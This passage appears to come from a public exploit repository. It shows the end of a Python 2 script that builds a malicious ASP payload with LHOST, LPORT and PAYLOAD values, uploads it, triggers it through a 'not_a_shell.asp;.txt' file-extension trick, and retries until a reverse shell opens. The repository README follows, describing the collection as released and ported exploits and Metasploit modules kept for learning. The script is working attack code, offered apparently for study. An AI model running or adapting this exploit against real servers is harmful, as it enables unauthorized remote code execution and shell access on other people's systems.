101 | 102 | def execute_again(TARGET): 103 | 104 | url = "http://" + TARGET + "/not_a_shell.asp;.txt" 105 | r = urllib2.Request(url) 106 | response = urllib2.urlopen(r) 107 | 108 | malicous_asp(LHOST, LPORT, PAYLOAD) 109 | upload_asp(TARGET) 110 | # Incase we got an error 111 | try: 112 | execute_asp(TARGET) 113 | except: 114 | print "[-] Execution Failed Trying Again" 115 | execute_again(TARGET) 116 | print "[?] Did You Get A Shell?" 117 | 118 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Developed Exploits 2 | 3 | This repository will contain any exploit or proof of concept code I release publicly. In addition to this, I will include Metasploit Modules, and ported exploits. 4 | 5 | ## Metasploit Modules 6 | 7 | This directory will contain all Metasploit modules I've developed. Note that code within this directory may be a standalone PoC in another directory. 8 | 9 | ## Ported Exploits 10 | 11 | Exploitation is one of the hardest skills to master as a Hacker. This directory will contain vulnerabilities I have not personally discovered, but instead re-created. In order to truly understand attacks, you must take apart an exploit and try to recreate it yourself. Keep in mind this repository only contains code published on other websites / blogs. I WILL NOT place every exploit I port here (would be a lot larger). 12 | --------------------------------------------------------------------------------